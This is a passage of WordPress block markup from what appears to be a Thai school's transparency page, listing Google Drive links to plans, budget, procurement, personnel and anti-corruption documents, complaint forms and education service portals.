900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" 